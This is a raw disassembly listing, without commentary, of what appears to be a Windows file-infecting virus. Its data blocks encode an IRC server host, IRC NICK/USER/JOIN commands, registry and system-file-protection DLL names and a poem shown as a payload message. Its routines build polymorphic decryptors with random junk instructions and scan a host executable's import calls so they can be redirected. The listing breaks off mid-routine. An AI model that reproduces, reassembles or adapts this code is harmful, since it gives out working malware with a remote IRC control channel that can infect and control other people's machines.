dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C7832EEBh, 0CC8B530Fh
dd 50D48B57h, 51406A54h, 0FFFF6A52h, 103F2295h, 968D8B00h
dd 8300103Eh, 0CF2B0CC4h, 0C707E983h, 0E8006A07h, 34F8900h
dd 464F53C3h, 52415754h, 694D5C45h, 736F7263h, 5C74666Fh
dd 646E6957h, 5C73776Fh, 72727543h, 56746E65h, 69737265h
dd 455C6E6Fh, 6F6C7078h, 726572h, 67726154h, 6F487465h
dd 2007473h, 500000h, 70000000h, 69786F72h, 72692E6Dh
dd 6C616763h, 2E797861h, 4E006C70h, 204B4349h, 6C766864h
dd 61767566h, 4553550Ah, 4A6B2052h, 204E494Fh, 72697626h
dd 550A7574h, 0E8h, 0ED815D00h, 101EB5h, 157F85C6h, 0FF000010h
dd 103EBA95h, 1FE8C100h, 1E6A3C74h, 3E72B58Bh, 0AC590010h
dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 103F76BDh, 2768B00h
dd 0A566A557h, 38EC858Dh, 858F0010h, 103912h, 0FA4689FAh
dd 0FBFE4E8Ch, 0CFE201B1h, 21E850EBh, 83FFFFFBh, 408247Ch
dd 8E84475h, 53000000h, 442E4346h, 0FF004C4Ch, 103EC695h
dd 74C00B00h, 26A930Dh, 6E95FF53h, 0FF00103Eh, 97E893D0h
dd 0E8FFFFFEh, 0Bh, 5F434653h, 442E534Fh, 0FF004C4Ch, 103EC695h
dd 0FE7CE800h, 0E8FFFFh, 0FFFFFFF6h, 1012D48Dh, 8DC93300h
dd 10432485h, 51515100h, 51515051h, 0C295FF51h, 0E800103Eh
dd 0Bh, 52455355h, 442E3233h, 0FF004C4Ch, 103EC695h, 0AE800h
dd 73770000h, 6E697270h, 416674h, 6E95FF50h, 8900103Eh
dd 103E7685h, 8D310F00h, 1019858Dh, 7C858900h, 5100103Fh
dd 3EC695FFh, 68930010h, 4, 1992B58Dh, 8D590010h, 103F62BDh
dd 0F5C2E800h, 0C766FFFFh, 101E7585h, 83500000h, 101E77A5h
dd 958D0000h, 101E35h, 16A5450h, 6852006Ah, 80000002h
dd 3F6695FFh, 0C0850010h, 8D22755Ah, 101E688Dh, 66A5200h
dd 1E75B58Dh, 56540010h, 52515050h, 3F6A95FFh, 0FF580010h
dd 103F6295h, 8385C600h, 1041h, 0CE8h, 4F535700h, 32334B43h
dd 4C4C442Eh, 0C695FF00h, 9300103Eh, 768h, 0E9B58D00h
dd 59001018h, 3F32BD8Dh, 3DE80010h, 0E8FFFFF5h, 0Ch, 494E4957h
dd 2E54454Eh, 4C4C44h, 3EC695FFh, 0C0850010h, 235840Fh
dd 68930000h, 5, 1927B58Dh, 8D590010h, 103F4EBDh, 0F506E800h
dd 0BD83FFFFh, 103F52h, 10840F00h, 81000002h, 190ECh, 1685400h
dd 0FF000001h, 103F3295h, 90C48100h, 50000001h, 6AD48Bh
dd 5295FF52h, 8500103Fh, 0D7559C0h, 138868h, 0E695FF00h
dd 0EB00103Eh, 77BD83E2h, 101Eh, 858D2975h, 101E7Bh, 3E95FF50h
dd 8500103Fh, 89840FC0h, 8B000001h, 8B0C40h, 858F30FFh
dd 101E77h, 418385C6h, 6A010010h, 6A016A00h, 4A95FF02h
dd 8300103Fh, 840FFFF8h, 160h, 73958D93h, 6A00101Eh, 0FF535210h
dd 103F3A95h, 0FC08500h, 14085h, 94BD8D00h, 0B100101Eh
dd 0FA3CE808h, 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h
dd 103EBEh, 1EA2BD8Dh, 1B10010h, 0FFFA1DE8h, 8F958DFFh
dd 6A00101Eh, 146800h, 53520000h, 3F4695FFh, 448D0010h
dd 958D1424h, 104324h, 0AB60F50h, 1424448Bh, 208E0C1h
dd 4A12014Ah, 34A1202h, 824440Bh, 0C10FE180h, 0B5108E0h
dd 0FF102444h, 0BD8D5032h, 103F84h, 1CE8h, 362E2500h, 202E2078h
dd 253A202Eh, 382E2525h, 20782578h, 4A0A7325h, 204E494Fh
dd 95FF5700h, 103E76h, 0ACC481h, 6A0000h, 0FF535750h, 103F4695h
dd 988D8B00h, 6A001015h, 6B1BE300h, 0E8510DC9h, 5, 0A642526h
dd 95FF5700h, 103E76h, 500CC483h, 7680BEBh, 8D000000h
dd 101EA8BDh, 0FF535700h, 103F4695h, 7EC08500h, 84B58D54h
dd 8300103Fh, 101598A5h, 8D8D0000h, 104183h, 6ACE2Bh, 0FF535651h
dd 103F4295h, 0F88300h, 8B912F7Eh, 84B58DFEh, 0B000103Fh
dd 75AEF20Dh, 2AE86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh
dd 2BCF8BEAh, 84BD8DCEh, 0F300103Fh, 0EBF787A4h, 95FF53B9h
dd 103F36h, 157FBD80h, 74010010h, 7530682Ah, 95FF0000h
dd 103EE6h, 4183BD80h, 74000010h, 7785C711h, 101Eh, 0C6000000h
dd 10418385h, 8E90000h, 0C7FFFFFEh, 10158885h, 0
dd 4C25D80h, 4F0A0D00h, 6F6F6E20h, 666F206Eh, 66696C20h
dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h
dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h
dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h
dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h
dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h
dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh
dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h
dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h
dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h
dd 656D6974h, 74492021h, 6C207327h, 21657461h, 4CA2A1A8h
dd 10A61429h, 40375232h, 40375248h, 8F908788h, 27B1FAE5h
dd 0C26CCC5Ch, 86E15194h, 658000B9h, 0D8B8B352h, 15h dup(0)
dd 0C768988Fh, 0F4A58360h, 1042h, 42F8A583h, 0F000010h
; CODE XREF: UPX2:3151D02E�p
; UPX2:3151D055�p ...
dd 8D1443B7h, 0B70F1853h, 0D003064Bh, 2424448Bh, 720C422Bh
dd 8423B19h, 428B1473h, 0C422B14h, 42F49589h, 85890010h
dd 1042F8h, 0C28305EBh, 61D9E228h, 880004C2h, 10246785h
dd 64E800h, 1F680000h, 8D000000h, 10239485h, 18395900h
dd 0C0830C74h, 0FFF7E204h, 1042D085h, 0D9F7C300h, 24678D03h
dd 10E30010h, 8FFC70FFh, 4E88300h, 9D89F6E2h, 102394h
dd 74003A83h, 3322B05h, 4E8D1072h, 5E5B58FCh, 74003A83h
dd 0EB32FF04h, 1072FF03h, 0FFFF57E8h, 2BCE2BFFh, 1042F88Dh
dd 4B035800h, 858FC334h, 1042D4h, 42D085C7h, 10h, 3CE80000h
dd 8B000000h, 1042D085h, 0F6A9E800h, 18E8FFFFh, 83000000h
dd 1042D0BDh, 8750000h, 24109D89h, 9CEB0010h, 42D08DFFh
dd 8FC30010h, 1042D485h, 0D0958900h, 0E8001042h, 3, 8BC3C933h
dd 8093h, 0EDE85200h, 3FFFFFEh, 1042F895h, 83D60300h, 0F000C7Ah
dd 10784h, 107A8300h, 0FD840F00h, 8B000000h, 0E8500C42h
dd 0FFFFFEC8h, 42F88503h, 0C6030010h, 80088A50h, 197400F9h
dd 742EF980h, 0F1EB4003h, 8101488Bh, 0DFDFDFE1h, 44F981DFh
dd 75004C4Ch, 0C82B59ECh, 0FFAF983h, 0B78Fh, 78816600h
dd 0F3233FEh, 0AB85h, 3A835600h, 8B057500h, 2EB104Ah, 0F1030A8Bh
dd 0FE72E851h, 0B503FFFFh, 1042F8h, 78C085ADh, 84840FFBh
dd 0FF000000h, 1042F8B5h, 55E85000h, 3FFFFFEh, 1042F885h
dd 0F8858F00h, 3001042h, 83532404h, 0DB3302C0h, 0E308B60Fh
dd 20C98012h, 2424C153h, 241C2904h, 5B240C29h, 81E9EB40h
dd 0BBD70FFBh, 813E74DDh, 6E45A8FBh, 813674DBh, 0A13B59FBh
dd 812E74FFh, 0B522D6FBh, 812674ACh, 58E993FBh, 811E74F3h
dd 58E97DFBh, 811674F3h, 253F46FBh, 810E74E1h, 253F30FBh
dd 0FF0674E1h, 1042D495h, 71E95B00h, 5EFFFFFFh, 0E914C283h
dd 0FFFFFEEFh, 46A01C3h, 0F549E858h, 9588FFFFh, 102641h
dd 1831B866h, 0E4C0E202h, 66E20203h, 58066AABh, 0FFF52EE8h
dd 8C283FFh, 56AD187h, 0F521E858h, 0FA80FFFFh, 0B00B7303h
dd 41850250h, 0AA001026h, 686A27EBh, 0FA80AA58h, 0B0187503h
dd 0F501E811h, 1B8FFFFh, 84000000h, 0D10D74D2h, 0EBCAFEE0h
dd 0B805EBF6h, 80000000h, 0C3BFE2ABh, 39CC958Dh, 0D72B0010h
dd 0F7C3DAF7h, 1039C085h, 0
; ---------------------------------------------------------------------------
adc [edi], cl
xchg eax, ebp
rol cl, 0E0h
or esi, esi
test [esi+1001039h], edi
jnz short loc_3151C7DA
or ax, 2589h
jmp short loc_3151C7ED
; ---------------------------------------------------------------------------
loc_3151C7DA: ; CODE XREF: UPX2:3151C7D2�j
test byte ptr [ebp+1039BEh], 2
jnz short loc_3151C7E9
or ax, 2531h
jmp short loc_3151C7ED
; ---------------------------------------------------------------------------
loc_3151C7E9: ; CODE XREF: UPX2:3151C7E1�j
or ax, 2501h
loc_3151C7ED: ; CODE XREF: UPX2:3151C7D8�j
; UPX2:3151C7E7�j
stosw
call near ptr dword_3151C514+29Ch
mov eax, [ebx+34h]
mov [ebp+1042E8h], edx
stosd
retn
; =============== S U B R O U T I N E =======================================
sub_3151C7FF proc near ; CODE XREF: UPX2:3151CE4B�p
test dword ptr [ebp+1039C0h], 10000000h
setnz al
add al, 0BCh
stosb
call near ptr dword_3151C514+29Ch
mov [ebp+1042ECh], edx
test byte ptr [ebp+1039BEh], 1
jnz short loc_3151C827
rdtsc
jmp short loc_3151C829
; ---------------------------------------------------------------------------
loc_3151C827: ; CODE XREF: sub_3151C7FF+22�j
sub eax, eax
loc_3151C829: ; CODE XREF: sub_3151C7FF+26�j
stosd
retn
sub_3151C7FF endp
; =============== S U B R O U T I N E =======================================
sub_3151C82B proc near ; CODE XREF: UPX2:loc_3151CE55�p
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_3151C85E
mov al, [ebp+1039BAh]
shl eax, 0Bh
or ax, 458Bh
stosw
mov al, 0F8h
stosb
mov al, [ebp+1039BAh]
shl eax, 1Bh
add eax, 6896467h
stosd
xor eax, eax
stosw
jmp short locret_3151C870
; ---------------------------------------------------------------------------
loc_3151C85E: ; CODE XREF: sub_3151C82B+A�j
mov eax, 58F64h
stosd
mov al, [ebp+1039BAh]
add al, 58h
shl eax, 18h
stosd
locret_3151C870: ; CODE XREF: sub_3151C82B+31�j
retn
sub_3151C82B endp
; =============== S U B R O U T I N E =======================================
sub_3151C871 proc near ; CODE XREF: sub_3151C8E3:loc_3151C90A�p
; sub_3151C8E3+4C�p ...
mov byte ptr [ebp+10279Ch], 9
jmp short loc_3151C89F
; ---------------------------------------------------------------------------
loc_3151C87A: ; CODE XREF: sub_3151C871+44�j
mov al, 0FCh
jmp short loc_3151C89E
; ---------------------------------------------------------------------------
loc_3151C87E: ; CODE XREF: sub_3151C871+48�j
mov ax, 0EBh
stosw
jmp short loc_3151C89F
; ---------------------------------------------------------------------------
loc_3151C886: ; CODE XREF: sub_3151C871+4C�j
push 4
pop eax
call near ptr dword_3151BC54+43h
lea eax, [edx+edx*8]
shl eax, 8
add ax, 0C089h
stosw
jmp short loc_3151C89F
; ---------------------------------------------------------------------------
loc_3151C89C: ; CODE XREF: sub_3151C871+50�j
mov al, 90h
loc_3151C89E: ; CODE XREF: sub_3151C871+B�j
; sub_3151C871+60�j ...
stosb
loc_3151C89F: ; CODE XREF: sub_3151C871+7�j
; sub_3151C871+13�j ...
push 1Bh
pop eax
call near ptr dword_3151BC54+43h
add byte ptr [ebp+10279Ch], 6
cmp dl, 8
jnb short locret_3151C8E2
test dl, dl
jz short loc_3151C87A
dec dl
jz short loc_3151C87E
dec dl
jz short loc_3151C886
dec dl
jz short loc_3151C89C
dec dl
jz short loc_3151C8D3
dec dl
jz short loc_3151C8DA
dec dl
jz short loc_3151C8DE
mov al, 0F9h
jmp short loc_3151C89E
; ---------------------------------------------------------------------------
loc_3151C8D3: ; CODE XREF: sub_3151C871+54�j
mov al, 87h
stosb
mov al, 0DBh
jmp short loc_3151C89E
; ---------------------------------------------------------------------------
loc_3151C8DA: ; CODE XREF: sub_3151C871+58�j
mov al, 0F5h
jmp short loc_3151C89E
; ---------------------------------------------------------------------------
loc_3151C8DE: ; CODE XREF: sub_3151C871+5C�j
mov al, 0F8h
jmp short loc_3151C89E
; ---------------------------------------------------------------------------
locret_3151C8E2: ; CODE XREF: sub_3151C871+40�j
retn
sub_3151C871 endp
; =============== S U B R O U T I N E =======================================
sub_3151C8E3 proc near ; CODE XREF: UPX2:loc_3151CD2C�p
; UPX2:3151CEDF�p
test dword ptr [ebp+1039C0h], 2000h
mov al, 86h
jnz short loc_3151C8F3
add al, 4
loc_3151C8F3: ; CODE XREF: sub_3151C8E3+C�j
lea ecx, [edi-2]
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short loc_3151C90A
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_3151C90A: ; CODE XREF: sub_3151C8E3+1E�j
call sub_3151C871
test dword ptr [ebp+1039C0h], 4000h
mov ax, 3166h
jnz short loc_3151C921
mov ah, 29h
loc_3151C921: ; CODE XREF: sub_3151C8E3+3A�j
stosw
mov al, 18h
or al, [ebp+1039BAh]
shl al, 3
stosb
call sub_3151C871
mov al, 88h
test dword ptr [ebp+1039C0h], 8000h
jnz short loc_3151C944
mov al, 86h
loc_3151C944: ; CODE XREF: sub_3151C8E3+5D�j
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short locret_3151C958
mov al, 0
or byte ptr [edi-1], 40h
stosb
locret_3151C958: ; CODE XREF: sub_3151C8E3+6C�j
retn
sub_3151C8E3 endp
; ---------------------------------------------------------------------------
loc_3151C959: ; CODE XREF: sub_3151D55F+183�p
lea edi, [ebp+1039CCh]
call sub_3151C871
test dword ptr [ebp+1039C0h], 400000h
jz short near ptr unk_3151C973
mov al, 60h
stosb
; ---------------------------------------------------------------------------
unk_3151C973 db 0F7h ; ; CODE XREF: UPX2:3151C96E�j
db 85h ;
db 0C0h ;
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
adc [edi+eax-48h], dh
push ebp
mov ebp, esp
add [ebx-3F7A08B1h], ch
cmp [eax], edx
add [ebx], al
; ---------------------------------------------------------------------------
db 2 dup(0), 2
dd 0F0840Fh, 0E8B00000h, 0BD89ABAAh, 1042D8h, 0FFFECCE8h
dd 0AAE8B0FFh, 0DCBD89ABh, 0E8001042h, 0FFFFFEBDh, 39C085F7h
dd 30010h, 1A740000h, 39C085F7h, 10h, 0A740200h, 0FFFE2EE8h
dd 0FE9BE8FFh, 0E9B0FFFFh, 858BABAAh, 1042D8h, 0C82BCF8Bh
dd 42E0BD89h, 48890010h, 6467B8FCh, 33AB36FFh, 0F7AB66C0h
dd 1039C085h, 300h, 0F6137400h, 1039BE85h, 0A748000h, 0FFFDAAE8h
dd 0FE5BE8FFh, 67B8FFFFh, 0AB268964h, 0AB66C033h, 39C085F7h
dd 30010h, 5A740000h, 39BE85F6h, 75800010h, 0FD81E80Ah
dd 32E8FFFFh, 0E8FFFFFEh, 0FFFFFD02h, 14E820B0h, 0E3FFFFFBh
dd 0FFB86639h, 91AB6615h, 0C0958BABh, 0F7001039h, 3C2F7D2h
dd 75000000h, 0FCDCE814h, 1FB0FFFFh, 0FFFAEEE8h, 0FFB866FFh
dd 91AB6615h, 8BCF8BABh, 1042E085h, 89C82B00h, 85F7FC48h
dd 1039C0h, 3, 85F73874h, 1039C0h, 0C000000h, 85F72C74h
dd 1039C0h, 2000000h, 0C2E80A75h, 0E8FFFFFDh, 0FFFFFD4Bh
dd 39C085F7h, 10h, 0A740800h, 0FFFDACE8h, 0FD61E8FFh, 85F7FFFFh
dd 1039C0h, 4, 96E81774h, 0B8FFFFFDh, 0C8FEC029h, 0C008B8ABh
dd 0B8AB0474h, 67EBF875h, 0FD7FE8ABh, 85F7FFFFh, 1039C0h
dd 8, 0BD807275h, 1039BEh, 0E8697400h, 0FFFFFD65h, 291829B8h
dd 0BAA50AC9h, 0C0001039h, 0A50A03E4h, 1039BAh, 0FD4BE8ABh
dd 0B1B0FFFFh, 0BE858AAAh, 0AA001039h, 0FFFD3CE8h, 85B60FFFh
dd 1039BAh, 4C0048Dh, 8E0C140h, 0AB668DB0h, 57AA01B0h
dd 0FFFD20E8h, 243C29FFh, 0FBE2B866h, 0C085F759h, 10001039h
dd 74000000h, 0AA49B007h, 0FA75B866h, 0AB66E102h, 0FFFCFCE8h
dd 0AAE8B0FFh, 89ABC033h, 1042C4BDh, 0C085F700h, 20001039h
dd 75000000h, 0DEE8573Bh, 0F7FFFFFCh, 1039C085h, 0
dd 89187480h, 1042F0BDh, 0FD39E800h, 0C2E8FFFFh, 0B0FFFFFCh
dd 0BAE8AAC3h, 5AFFFFFCh, 58B0CF8Bh, 850ACA2Bh, 1039B8h
dd 0AAFC4A89h, 0FFFCA4E8h, 81B866FFh, 0C085F7C0h, 40001039h
dd 74000000h, 28C48003h, 39B8A50Ah, 0AB660010h, 42C8BD89h
dd 0F7AB0010h, 1039C085h, 0
; ---------------------------------------------------------------------------
inc eax
jnz short loc_3151CC04
mov al, 50h
add al, [ebp+1039B8h]
stosb
loc_3151CC04: ; CODE XREF: UPX2:3151CBF9�j
test dword ptr [ebp+1039C0h], 80h
jnz short loc_3151CC1B
mov al, 0B8h
or al, [ebp+1039B9h]
stosb
jmp short loc_3151CC58
; ---------------------------------------------------------------------------
loc_3151CC1B: ; CODE XREF: UPX2:3151CC0E�j
mov ax, 1831h
test dword ptr [ebp+1039C0h], 100h
jz short loc_3151CC2D
mov al, 29h
loc_3151CC2D: ; CODE XREF: UPX2:3151CC29�j
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
mov ax, 0F081h
test dword ptr [ebp+1039C0h], 200h
jnz short loc_3151CC50
mov ah, 0C8h
loc_3151CC50: ; CODE XREF: UPX2:3151CC4C�j
or ah, [ebp+1039B9h]
stosw
loc_3151CC58: ; CODE XREF: UPX2:3151CC19�j
mov [ebp+1042E4h], edi
mov eax, 29CCh
stosd
test dword ptr [ebp+1039C0h], 8
jz short loc_3151CCE1
call sub_3151C871
test dword ptr [ebp+1039C0h], 400h
jnz short loc_3151CC8C
mov al, 0B8h
or al, [ebp+1039BAh]
stosb
jmp short loc_3151CCD9
; ---------------------------------------------------------------------------
loc_3151CC8C: ; CODE XREF: UPX2:3151CC7F�j
test dword ptr [ebp+1039C0h], 800h
jnz short loc_3151CCA9
mov ax, 0E083h
or ah, [ebp+1039BAh]
stosw
xor eax, eax
stosb
jmp short loc_3151CCBE
; ---------------------------------------------------------------------------
loc_3151CCA9: ; CODE XREF: UPX2:3151CC96�j
mov ax, 1829h
or ah, [ebp+1039BAh]
shl ah, 3
or ah, [ebp+1039BAh]
stosw
loc_3151CCBE: ; CODE XREF: UPX2:3151CCA7�j
test dword ptr [ebp+1039C0h], 1000h
mov ax, 0C081h
jz short loc_3151CCD1
add ah, 8
loc_3151CCD1: ; CODE XREF: UPX2:3151CCCC�j
or ah, [ebp+1039BAh]
stosw
loc_3151CCD9: ; CODE XREF: UPX2:3151CC8A�j
movzx eax, byte ptr [ebp+1039BEh]
stosd
loc_3151CCE1: ; CODE XREF: UPX2:3151CC6E�j
call sub_3151C871
test dword ptr [ebp+1039C0h], 40000000h
jz short loc_3151CD00
mov al, 50h
add al, [ebp+1039B8h]
stosb
call sub_3151C871
loc_3151CD00: ; CODE XREF: UPX2:3151CCF0�j
lea ecx, [edi-2]
mov [ebp+1042CCh], ecx
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_3151CD2C
mov al, 0E8h
stosb
mov eax, [ebp+1042F0h]
sub eax, edi
sub eax, 4
stosd
mov [ebp+1042F0h], edi
jmp short loc_3151CD31
; ---------------------------------------------------------------------------
loc_3151CD2C: ; CODE XREF: UPX2:3151CD13�j
call sub_3151C8E3
loc_3151CD31: ; CODE XREF: UPX2:3151CD2A�j
call sub_3151C871
test dword ptr [ebp+1039C0h], 10000h
jnz short loc_3151CD4D
mov al, 40h
or al, [ebp+1039B8h]
stosb
jmp short loc_3151CD5C
; ---------------------------------------------------------------------------
loc_3151CD4D: ; CODE XREF: UPX2:3151CD40�j
mov ax, 0C083h
or ah, [ebp+1039B8h]
stosw
mov al, 1
stosb
loc_3151CD5C: ; CODE XREF: UPX2:3151CD4B�j
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_3151CD97
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_3151CD8E
mov al, 0C0h
or al, [ebp+1039BAh]
mov ah, [ebp+1039BFh]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_3151CD96
; ---------------------------------------------------------------------------
loc_3151CD8E: ; CODE XREF: UPX2:3151CD72�j
mov al, 40h
or al, [ebp+1039BAh]
loc_3151CD96: ; CODE XREF: UPX2:3151CD8C�j
stosb
loc_3151CD97: ; CODE XREF: UPX2:3151CD66�j
test dword ptr [ebp+1039C0h], 80000h
jnz short loc_3151CDB3
mov ax, 0E883h
or ah, [ebp+1039B9h]
stosw
mov al, 1
jmp short loc_3151CDBB
; ---------------------------------------------------------------------------
loc_3151CDB3: ; CODE XREF: UPX2:3151CDA1�j
mov al, 48h
or al, [ebp+1039B9h]
loc_3151CDBB: ; CODE XREF: UPX2:3151CDB1�j
stosb
call sub_3151C871
test dword ptr [ebp+1039C0h], 100000h
mov cl, 75h
jnz short loc_3151CDF4
mov ax, 0F883h
or ah, [ebp+1039B9h]
stosw
xor eax, eax
stosb
sub [ebp+1042CCh], edi
test dword ptr [ebp+1039C0h], 200000h
jnz short loc_3151CE0F
mov cl, 77h
jmp short loc_3151CE0F
; ---------------------------------------------------------------------------
loc_3151CDF4: ; CODE XREF: UPX2:3151CDCD�j
mov ax, 1809h
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
sub [ebp+1042CCh], edi
loc_3151CE0F: ; CODE XREF: UPX2:3151CDEE�j
; UPX2:3151CDF2�j
mov al, cl
mov ah, [ebp+1042CCh]
stosw
mov al, 58h
add al, [ebp+1039B8h]
stosb
call sub_3151C871
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_3151CE5F
test dword ptr [ebp+1039C0h], 8000000h
jnz short loc_3151CE5F
test dword ptr [ebp+1039C0h], 6000000h
jnz short loc_3151CE55
call sub_3151C7FF
call sub_3151C871
loc_3151CE55: ; CODE XREF: UPX2:3151CE49�j
call sub_3151C82B
call sub_3151C871
loc_3151CE5F: ; CODE XREF: UPX2:3151CE31�j
; UPX2:3151CE3D�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_3151CE73
mov al, 0C9h
stosb
call sub_3151C871
loc_3151CE73: ; CODE XREF: UPX2:3151CE69�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_3151CEA9
mov al, 7
sub al, [ebp+1039B8h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+1039B8h]
shl ah, 3
add ah, 4
stosd
call sub_3151C871
mov al, 61h
stosb
call sub_3151C871
loc_3151CEA9: ; CODE XREF: UPX2:3151CE7D�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
stosw
call sub_3151C871
test dword ptr [ebp+1039C0h], 20h
jz short loc_3151CF35
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_3151CEF1
mov eax, edi
mov ecx, [ebp+1042F0h]
sub eax, ecx
mov [ecx-4], eax
call sub_3151C8E3
call sub_3151C871
mov al, 0C3h
stosb
call sub_3151C871
loc_3151CEF1: ; CODE XREF: UPX2:3151CED0�j
mov eax, edi
mov ecx, [ebp+1042C4h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+1039B8h]
stosb
call sub_3151C871
test dword ptr [ebp+1039C0h], 800000h
jz short loc_3151CF24
mov ax, 0C350h
or al, [ebp+1039B8h]
jmp short loc_3151CF2E
; ---------------------------------------------------------------------------
loc_3151CF24: ; CODE XREF: UPX2:3151CF16�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
loc_3151CF2E: ; CODE XREF: UPX2:3151CF22�j
stosw
call sub_3151C871
loc_3151CF35: ; CODE XREF: UPX2:3151CEC4�j
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_3151CFA0
mov ecx, edi
mov eax, [ebp+1042DCh]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+1039C0h], 1000000h
jnz short loc_3151CF6A
lea eax, [ebp+1039B8h]
loc_3151CF62: ; CODE XREF: UPX2:3151CF68�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_3151CF62
loc_3151CF6A: ; CODE XREF: UPX2:3151CF5A�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_3151CF7F
mov ax, 0C031h
stosw
loc_3151CF7F: ; CODE XREF: UPX2:3151CF77�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_3151CF98
mov ax, 0C031h
stosw
loc_3151CF98: ; CODE XREF: UPX2:3151CF90�j
mov al, 0C3h
stosb
call sub_3151C871
loc_3151CFA0: ; CODE XREF: UPX2:3151CF3F�j
lea eax, [ebp+1039CCh]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_3151CFB8
push edi
sub edi, eax
pop eax
jmp short loc_3151CFD1
; ---------------------------------------------------------------------------
loc_3151CFB8: ; CODE XREF: UPX2:3151CFB0�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+1042E4h]
add [ebp+1042C4h], edx
add [ecx], edi
mov eax, [esp+4]
loc_3151CFD1: ; CODE XREF: UPX2:3151CFB6�j
mov [ebp+101069h], edi
mov edi, [ebp+1042C8h]
sub eax, [ebp+1042C4h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_3151CFF1
neg eax
loc_3151CFF1: ; CODE XREF: UPX2:3151CFED�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_3151CFF5 proc near ; CODE XREF: sub_3151D55F+336�p
push esi
push edi
cmp dword ptr [ebp+104300h], 0
jz loc_3151D1DD
call near ptr loc_3151D015+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_3151D015: ; CODE XREF: sub_3151CFF5+F�p
add bh, bh
sub_3151CFF5 endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
mov [ebp+104314h], eax
push ebx
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call near ptr dword_3151C514+4
mov edx, [ebp+1042F4h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+104318h], eax
add eax, [edx+8]
mov [ebp+10431Ch], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call near ptr dword_3151C514+4
mov edi, [ebp+1042F4h]
push esi
call near ptr dword_3151C514+4
mov edx, [ebp+1042F4h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_3151D1DD
jz loc_3151D1DD
add esi, [ebp+1042F8h]
add esi, [ebp+1042B4h]
; START OF FUNCTION CHUNK FOR sub_3151D1AE
loc_3151D08F: ; CODE XREF: sub_3151D1AE+29�j
lodsb
cmp al, 0E8h
jnz loc_3151D13A
lea eax, [esi+4]
sub eax, [ebp+1042B4h]
add eax, [esi]
push eax
call near ptr dword_3151C514+4
cmp dword ptr [ebp+1042F4h], 0
jnz short loc_3151D0BD
cmp eax, [edi+0Ch]
jnb loc_3151D1D6
jmp short loc_3151D0C9
; ---------------------------------------------------------------------------
loc_3151D0BD: ; CODE XREF: sub_3151D1AE-FE�j
cmp [ebp+1042F4h], edx
jnz loc_3151D1D6
loc_3151D0C9: ; CODE XREF: sub_3151D1AE-F3�j
add eax, [ebp+1042B4h]
cmp word ptr [eax], 25FFh
jnz loc_3151D1D6
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call near ptr dword_3151C514+4
cmp [ebp+1042F4h], edi
jnz loc_3151D1D6
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_3151D1D6
cmp eax, [edi+8]
jnb loc_3151D1D6
loc_3151D112: ; CODE XREF: sub_3151D1AE+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+1042B4h]
push edx
push eax
push dword ptr [ebp+104314h]
call dword ptr [ebp+103E6Eh]
pop edx
test eax, eax
jnz loc_3151D1EC
jmp loc_3151D1D6
; ---------------------------------------------------------------------------
loc_3151D13A: ; CODE XREF: sub_3151D1AE-11C�j
cmp al, 0FFh
jnz loc_3151D1D6
cmp byte ptr [esi], 15h
jnz loc_3151D1D6
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call near ptr dword_3151C514+4
cmp [ebp+1042F4h], edi
jnz short loc_3151D1D6
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov [ebp+104320h], eax
mov eax, [eax]
cmp eax, [ebp+104318h]
jb short loc_3151D183
